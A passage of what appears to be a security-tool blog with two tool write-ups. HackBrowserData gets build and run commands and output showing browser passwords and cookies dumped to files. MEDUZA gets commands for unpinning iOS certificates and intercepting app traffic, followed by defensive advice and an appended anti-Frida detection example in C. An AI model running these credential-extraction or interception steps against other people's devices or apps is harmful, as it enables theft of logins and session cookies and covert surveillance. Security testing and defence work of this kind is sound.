align="center">Cookie</th> <th align="center">Bookmark</th> <th align="center">History</th> </tr> <tr> <td align="left">Google Chrome</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Firefox</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Microsoft Edge</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Safari</td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> </tr> </tbody></table> <br /><b>Linux</b><br /> <table> <tbody><tr> <th align="left">Browser</th> <th align="center">Password</th> <th align="center">Cookie</th> <th align="center">Bookmark</th> <th align="center">History</th> </tr> <tr> <td align="left">Firefox</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Google Chrome</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Install</b></span><br /> <p>Installation of hack-browser-data is dead-simple: just download <a href="https://github.com/moonD4rk/HackBrowserData/releases" rel="nofollow" target="_blank" title="the release for your system">the release for your system</a> and run the binary.</p> <br /><b>Building from source</b><br /> <p>Requires <code>go 1.11+</code>.</p> <div><pre><code>git clone https://github.com/moonD4rk/HackBrowserData<br /><br />cd HackBrowserData<br /><br />go get -v -t -d ./...<br /><br />go build</code></pre></div> <br /><b>Cross compile</b><br /> <p>You need to install the target OS's <code>gcc</code> toolchain; here is an example of using a <code>Mac</code> to build for <code>Windows</code> and <code>Linux</code>.</p> <p><strong>Windows</strong></p> <div><pre><code>brew install mingw-w64<br /><br />CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC="x86_64-w64-mingw32-gcc" go build</code></pre></div> <p><strong>Linux</strong></p> <div><pre><code>brew install FiloSottile/musl-cross/musl-cross<br /><br />CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_ENABLED=1 go build -ldflags "-linkmode external -extldflags -static"</code></pre></div> <br /><b>Run</b><br /> <p>You can double-click to run, or use the command line.</p> <pre><code>PS C:\test> .\hack-browser-data.exe -h<br />NAME:<br />   hack-browser-data - Export passwords/cookies/history/bookmarks from browser<br />USAGE:<br />   [hack-browser-data -b chrome -f json -dir results -cc]<br />   Get all data(password/cookie/history/bookmark) from chrome<br />VERSION:<br />   0.2.3<br />GLOBAL OPTIONS:<br />   --verbose, --vv                   Verbose (default: false)<br />   --compress, --cc                  Compress result to zip (default: false)<br />   --browser value, -b value         Available browsers: all|edge|firefox|chrome (default: "all")<br />   --results-dir value, --dir value  Export dir (default: "results")<br />   --format value, -f value          Format, csv|json|console (default: "json")<br />   --help, -h                        show help (default: false)<br />   --version, -v                     print the version (default: false)<br /><br />PS C:\test> .\hack-browser-data.exe -b all -f json --dir results -cc<br />[x]: Get 44 cookies, filename is results/microsoft_edge_cookie.json<br />[x]: Get 54 history, filename is results/microsoft_edge_history.json<br />[x]: Get 1 passwords, filename is results/microsoft_edge_password.json<br />[x]: Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json<br />[x]: Get 6 bookmarks, filename is results/360speed_bookmark.json<br />[x]: Get 19 cookies, filename is results/360speed_cookie.json<br />[x]: Get 18 history, filename is results/360speed_history.json<br />[x]: Get 1 passwords, filename is results/360speed_password.json<br />[x]: Get 12 history, filename is results/qq_history.json<br />[x]: Get 1 passwords, filename is results/qq_password.json<br />[x]: Get 12 bookmarks, filename is results/qq_bookmark.json<br />[x]: Get 14 cookies, filename is results/qq_cookie.json<br />[x]: Get 28 bookmarks, filename is results/firefox_bookmark.json<br />[x]: Get 10 cookies, filename is results/firefox_cookie.json<br />[x]: Get 33 history, filename is results/firefox_history.json<br />[x]: Get 1 passwords, filename is results/firefox_password.json<br />[x]: Get 1 passwords, filename is results/chrome_password.json<br />[x]: Get 4 bookmarks, filename is results/chrome_bookmark.json<br />[x]: Get 6 cookies, filename is results/chrome_cookie.json<br />[x]: Get 6 history, filename is results/chrome_history.json<br />[x]: Compress success, zip filename is results/archive.zip<br /></code></pre> <br /><span style="font-size: large;"><b>TODO</b></span><br /> <p><a href="https://gs.statcounter.com/browser-market-share/desktop/worldwide" rel="nofollow" target="_blank" title="Desktop Browser Market Share Worldwide">Desktop Browser Market Share Worldwide</a></p> <table><tbody><tr> <th align="center">Chrome</th> <th align="center">Safari</th> <th align="center">Firefox</th> <th align="center">Edge Legacy</th> <th align="center">IE</th> <th align="center">Other</th> </tr> <tr> <td align="center">68.33%</td> <td align="center">9.4%</td> <td align="center">8.91%</td> <td align="center">4.41%</td> <td align="center">3%</td> <td 
align="center">3%</td> </tr> </tbody></table> <p><a href="https://gs.statcounter.com/browser-market-share/desktop/china" rel="nofollow" target="_blank" title="Desktop Browser Market Share China">Desktop Browser Market Share China</a></p> <table> <tbody><tr> <th align="left">Chrome</th> <th align="center">360 Safe</th> <th align="center">Firefox</th> <th align="center">QQ Browser</th> <th align="center">IE</th> <th align="center">Sogou Explorer</th> </tr> <tr> <td align="left">39.85%</td> <td align="center">22.26%</td> <td align="center">9.28%</td> <td align="center">6.5%</td> <td align="center">5.65%</td> <td align="center">4.74%</td> </tr> </tbody></table> <ul class="contains-task-list"> <li class="task-list-item">Chrome</li> <li class="task-list-item">QQ browser</li> <li class="task-list-item">Edge</li> <li class="task-list-item">360 speed browser</li> <li class="task-list-item">Firefox</li> <li class="task-list-item">Safari</li> <li class="task-list-item">IE</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/moonD4rk/HackBrowserData" rel="nofollow" target="_blank" title="Download HackBrowserData">Download HackBrowserData</a></span></b></div>2020-10-14T08:30:00.008-03:00 2020-10-14T08:30:09.172-03:00 MEDUZA - A More Or Less Universal SSL Unpinning Tool For iOS<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-TLGeEX7NEgg/X4Uqjd5FibI/AAAAAAAAUBQ/3VnK57T0_FkuF2kfY4D5LgU0xRTs6O6kgCNcBGAsYHQ/s2048/MEDUZA_2_mitmpoxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1129" data-original-width="2048" height="352" src="https://1.bp.blogspot.com/-TLGeEX7NEgg/X4Uqjd5FibI/AAAAAAAAUBQ/3VnK57T0_FkuF2kfY4D5LgU0xRTs6O6kgCNcBGAsYHQ/w640-h352/MEDUZA_2_mitmpoxy.png" width="640" /></a></div><br 
/><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4pJveBV4Bx0/X4UqjKvVb_I/AAAAAAAAUBM/pBQfw5ozuso6EPwy7z08aUaZEkP0d6lyACNcBGAsYHQ/s2510/MEDUZA_1_frida-script.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1108" data-original-width="2510" height="282" src="https://1.bp.blogspot.com/-4pJveBV4Bx0/X4UqjKvVb_I/AAAAAAAAUBM/pBQfw5ozuso6EPwy7z08aUaZEkP0d6lyACNcBGAsYHQ/w640-h282/MEDUZA_1_frida-script.png" width="640" /></a></div><p><br /></p><p>"MEDUZA" ("медуза") means "jellyfish" in Ukrainian.</p> <br /><span style="font-size: large;"><b>What is MEDUZA?</b></span><br /> <p>It's a <a href="https://frida.re/" rel="nofollow" target="_blank" title="Frida">Frida</a>-based tool, my replacement for <a href="https://github.com/nabla-c0d3/ssl-kill-switch2" rel="nofollow" target="_blank" title="SSLKillSwitch">SSLKillSwitch</a>. I created it for in-house use, but then decided to open-source it. TBH, I hate open source, but the world is full of compromises... :(</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>How does it work?</b></span><br /> <p>It's simple. The first time, you run the app without <a href="https://www.kitploit.com/search/label/Sniffing" target="_blank" title="sniffing">sniffing</a> and use it as usual. MEDUZA sits quietly and collects the <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> the app uses to connect to servers. Then MEDUZA generates a Frida script that fakes (==unpins) the collected certificates. So you run the app a second time with the generated script, and catch the traffic with mitmproxy.</p> <br /><span style="font-size: large;"><b>Limitations</b></span><br /> <p>MEDUZA can only unpin apps that use the iOS system SSL libs. Some apps (e.g. 
Instagram) do not use the system SSL libs; they ship a third-party or custom SSL stack (for example, <a href="https://www.kitploit.com/search/label/Instagram" target="_blank" title="Instagram">Instagram</a> uses OpenSSL statically linked into Instagram's private frameworks, see <a href="https://github.com/kov4l3nko/InstagramSSLPinningBypass-iOS" rel="nofollow" target="_blank" title="InstagramSSLPinningBypass-iOS">InstagramSSLPinningBypass-iOS</a> for details).</p> <p>Also, MEDUZA is based on Frida, so it does not work on apps with anti-Frida protection.</p> <br /><span style="font-size: large;"><b>Can I use MEDUZA alongside other SSL bypass tools, e.g. SSLKillSwitch?</b></span><br /> <p>I didn't test it, but MEDUZA employs a different approach than SSLKillSwitch and similar tools, so, theoretically, they should work together without problems. Again, I didn't test it, so I'm not 100% sure.</p> <br /><span style="font-size: large;"><b>Requirements</b></span><br /> <ul> <li> <p>A Mac with macOS Mojave or later (maybe MEDUZA works on Windows and Linux as well, but it was not tested)</p> </li> <li> <p>A jailbroken iOS device (MEDUZA was tested on an iPhone SE 2016 with iOS 13.3 and an iPhone 6s with iOS 14.0, both jailbroken with <a href="https://checkra.in/" rel="nofollow" target="_blank" title="checkra1n">checkra1n</a>; theoretically, MEDUZA should work with other devices as well, but it was not tested)</p> </li> <li> <p>The latest <a href="https://frida.re/" rel="nofollow" target="_blank" title="Frida">Frida</a> installed on the Mac and the iOS device.</p> </li> <li> <p><a href="https://mitmproxy.org/" rel="nofollow" target="_blank" title="Mitmproxy">Mitmproxy</a> installed on the Mac (MEDUZA was not tested with other sniffers like <a href="https://www.kitploit.com/search/label/Charles" target="_blank" title="Charles">Charles</a> proxy, I'm not sure it will work)</p> </li> <li> <p>The Mac and iOS device should be connected with a USB data cable and connected 
to the same WiFi network.</p> </li> <li> <p>Python 3 with <a href="https://pypi.org/project/cryptography/" rel="nofollow" target="_blank" title="cryptography">cryptography</a> on the Mac (just <code>pip install cryptography</code>)</p> </li> </ul> <br /><span style="font-size: large;"><b>How to sniff HTTP(s) traffic?</b></span><br /> <p>There are two general steps. The first step catches all certificates pinned by an app and generates a script to fake (==unpin) them. You do it just once at the very beginning; after that you can simply use the generated script to sniff the traffic. The instructions for the first step:</p> <ol> <li> <p>Open Terminal on your Mac and run MEDUZA to list the installed/running apps on your iOS device:</p> <pre><code>$ python3 meduza.py -l<br /></code></pre> <p>The output should look like</p> <pre><code>MEDUZA iOS SSL unpinning tool<br />by Dima Kovalenko (@kov4l3nko)<br />============================================================<br /><br />[*] Waiting for an iOS device connected to USB...<br />[*] A list of installed applications:<br /> + Uber (com.ubercab.UberClient) is running, pid=40663<br /> - Home (com.apple.Home)<br /> - Files (com.apple.DocumentsApp)<br /> - Podcasts (com.apple.podcasts)<br /> - Contacts (com.apple.MobileAddressBook)<br /> - Music (com.apple.Music)<br /> - Photos (com.apple.mobileslideshow)<br /> - TV (com.apple.tv)<br /> + App Store (com.apple.AppStore) is running, pid=40627<br /> - Clock (com.apple.mobiletimer)<br /> + Settings (com.apple.Preferences) is running, pid=40619<br /> - TikTok (com.zhiliaoapp.musically)<br /> - Watch (com.apple.Bridge)<br /> - FaceTime (com.apple.facetime)<br /> - Maps (com.apple.Maps)<br /> - Voice Memos (com.apple.VoiceMemos)<br /> <...etc, you'll see remaining apps here...><br /></code></pre> </li> <li> <p><strong>Important!</strong> Make sure your iOS device's WiFi settings are "clean", i.e. no proxy and/or custom router IP specified. 
In the first step, we <strong>do not try to sniff the traffic</strong>, so the WiFi network connection should be "as usual".</p> </li> <li> <p>Choose the app, e.g. Uber. Run MEDUZA as follows</p> <pre><code>$ python3 meduza.py -s <app name or id> <path/to/the/frida/script.js><br /></code></pre> <p>e.g. for Uber</p> <pre><code>$ python3 meduza.py -s com.ubercab.UberClient ./unpinUber.js<br /></code></pre> <p>Here <code>-s</code> means that Uber will be (re-)spawned. If you want to attach to an already running app without re-spawning it, use <code>-a</code> instead of <code>-s</code>.</p> <p>As a result, you should see something like</p> <pre><code>MEDUZA iOS SSL unpinning tool<br />by Dima Kovalenko (@kov4l3nko)<br />============================================================<br /><br />[*] Waiting for an iOS device connected to USB...<br />[*] Spawning com.ubercab.UberClient...<br />[*] Attaching to com.ubercab.UberClient...<br />[*] Reading JS payload meduza.js...<br />[*] Injecting JS payload to the process...<br />[*] SecCertificateCreateWithBytes(...) 
hooked!<br />[*] Resuming the application...<br />[*] Press ENTER to complete (you can do it anytime)...<br />[*] Got another certificate, its raw SHA256 hash: 99b05557bafde776f0afc15bbf6733585b8a03606cbf757158fb96324e01310a<br /> crashlytics.com<br /> reports.crashlytics.com<br /> firebase-settings.crashlytics.com<br /> apps-ios.crashlytics.com<br /> android-sdk.crashlytics.com<br /> api.crashlytics.com<br /> settings-api.crashlytics.com<br /> download.crashlytics.com<br /> distribution-uploads.crashlytics.com<br /> cm-us-east-1.crashlytics.com<br /> www.crashlytics.com<br /> try.crashlytics.com<br /> kits.crashlytics.com<br /> cm.crashlytics.com<br /> apps.crashlytics.com<br /> cm-ap-southeast.crashlytics.com<br /> settings.crashlytics.com<br /> e.crashlytics.com<br />[*] Got another certificate, its raw SHA256 hash: 954a9f7dd9f03784bdc5ca9183484a5bfc278ca9ba9f42b3a82f96cffddf277b<br />[*] Got another certificate, its raw SHA256 hash: 649a4665273e60b353fe9b4db1807d9669f82cb0ee85bd1e562e7c2f33fdec3a<br /> *.cfe.uber.com<br /> cfe.uber.com<br /> cn-dca1.cfe.uber.com<br />[*] Got another certificate, its raw SHA256 hash: eae72eb454bf6c3977ebd289e970b2f5282949190093d0d26f98d0f0d6a9cf17<br /><...etc, you can see many messages about certificates, it's ok...><br /></code></pre> </li> <li> <p>Do something typical in the app: log in, tap some buttons, log off... i.e. act like an ordinary dumb user :) Every time the app uses a (pinned or not pinned) certificate to connect to a server, MEDUZA catches and remembers the certificate.</p> </li> <li> <p>As soon as you complete your monkey-tapping, press <code>ENTER</code> in the Terminal. MEDUZA will generate the script (e.g. <code>./unpinUber.js</code> in the example above).</p> </li> </ol> <p>The first step is completed. 
The second step is to use the script:</p> <ol> <li> <p>Run <code>ifconfig | grep "inet "</code> in your Mac Terminal to see your Mac's IP address.</p> </li> <li> <p>Run Mitmproxy on your Mac</p> </li> <li> <p>On your iOS device, set the Mac's IP and mitmproxy port (<code>8080</code> by default) as a proxy for the WiFi connection.</p> </li> <li> <p>Run the generated script with the app. E.g. to (re-)spawn and unpin the Uber app, run in Mac Terminal</p> <pre><code>$ frida -U -f com.ubercab.UberClient --no-pause -l ./unpinUber.js<br /></code></pre> <p>See the Frida documentation for other options (e.g. to attach to an already running application).</p> </li> </ol> <br /><span style="font-size: large;"><b>How to protect an app from MEDUZA?</b></span><br /> <p>There are many ways to do it, e.g.</p> <ol> <li> <p>Instagram uses a statically-linked fork of OpenSSL instead of the iOS system libs to implement its SSL stack. That is why MEDUZA doesn't work on Instagram.</p> </li> <li> <p>You can add some anti-Frida <a href="https://www.kitploit.com/search/label/Protection" target="_blank" title="protection">protection</a> to your app. MEDUZA is based on Frida: if Frida fails, MEDUZA fails as well.</p> </li> </ol> <br /><span style="font-size: large;"><b>MEDUZA doesn't work, what to do?</b></span><br /> <p>Try to fix it yourself or create an issue. However, I take a look at this GitHub account from time to time ( ==once a year) and support MEDUZA in my spare time ( ==never), so I can't guarantee any support. Welcome to the open-source world ;(</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/kov4l3nko/MEDUZA" rel="nofollow" target="_blank" title="Download MEDUZA">Download MEDUZA</a></span></b></div>
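The second protection the list above mentions, "anti-Frida protection", is usually a runtime self-check inside the app. The following is an added illustration of such a check, written for this page; it is not MEDUZA's code nor any project's code. It combines two widely used signals: a TCP connect attempt to frida-server's default listen port (27042 on the loopback interface) and a scan of the loaded modules for a name containing "frida" (Frida injects frida-agent, and embedded gadgets are usually named FridaGadget). On Apple platforms the module list comes from dyld; the `/proc/self/maps` branch is an assumed fallback so the example also builds and runs on Linux. The function and constant names are the example's own.

```c
/*
 * Anti-instrumentation self-check (added example, not MEDUZA's code).
 * Signals used:
 *   1. a listener on 127.0.0.1:27042, frida-server's default port
 *   2. a loaded module whose path contains "frida"
 * Module enumeration: dyld on Apple platforms, /proc/self/maps elsewhere
 * (the /proc fallback is an assumption so the example compiles on Linux).
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifdef __APPLE__
#include <mach-o/dyld.h>
#endif

#define FRIDA_DEFAULT_PORT 27042   /* documented frida-server default */

/* Case-insensitive substring test; 1 if `needle` occurs in `path`. */
int module_name_matches(const char *path, const char *needle) {
    size_t n = strlen(needle);
    if (n == 0) return 0;
    for (const char *p = path; *p; p++) {
        size_t i = 0;
        while (i < n && p[i] &&
               tolower((unsigned char)p[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return 1;
    }
    return 0;
}

/* 1 if something accepts TCP connections on 127.0.0.1:port, else 0. */
int tcp_port_open(unsigned short port) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return 0;                      /* no socket: treat as "not seen" */
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(0x7f000001UL);  /* 127.0.0.1 */
    int open = connect(fd, (struct sockaddr *)&sa, sizeof sa) == 0;
    close(fd);
    return open;
}

/* Number of loaded modules whose path contains `needle` (case-insensitive). */
int count_loaded_modules_matching(const char *needle) {
    int hits = 0;
#ifdef __APPLE__
    uint32_t n = _dyld_image_count();
    for (uint32_t i = 0; i < n; i++) {
        const char *name = _dyld_get_image_name(i);
        if (name && module_name_matches(name, needle)) hits++;
    }
#else
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps) return 0;
    char line[512];
    char last[512] = "";
    while (fgets(line, sizeof line, maps)) {
        const char *path = strchr(line, '/');   /* mapping path, if any */
        if (!path) continue;
        /* a library has several consecutive mappings; count each path once */
        if (strcmp(path, last) == 0) continue;
        strncpy(last, path, sizeof last - 1);
        if (module_name_matches(path, needle)) hits++;
    }
    fclose(maps);
#endif
    return hits;
}

/* 1 if either signal fires. */
int frida_present(void) {
    return tcp_port_open(FRIDA_DEFAULT_PORT) ||
           count_loaded_modules_matching("frida") > 0;
}

int main(void) {
    printf("frida signals: port=%d modules=%d -> %s\n",
           tcp_port_open(FRIDA_DEFAULT_PORT),
           count_loaded_modules_matching("frida"),
           frida_present() ? "instrumentation suspected" : "clean");
    return 0;
}
```

Both signals are cheap and both are avoidable by a determined tester (frida-server can listen elsewhere and a gadget can be renamed), so a hit should feed a resilience policy that also includes code-integrity and jailbreak checks and server-side telemetry, rather than act as the only gate.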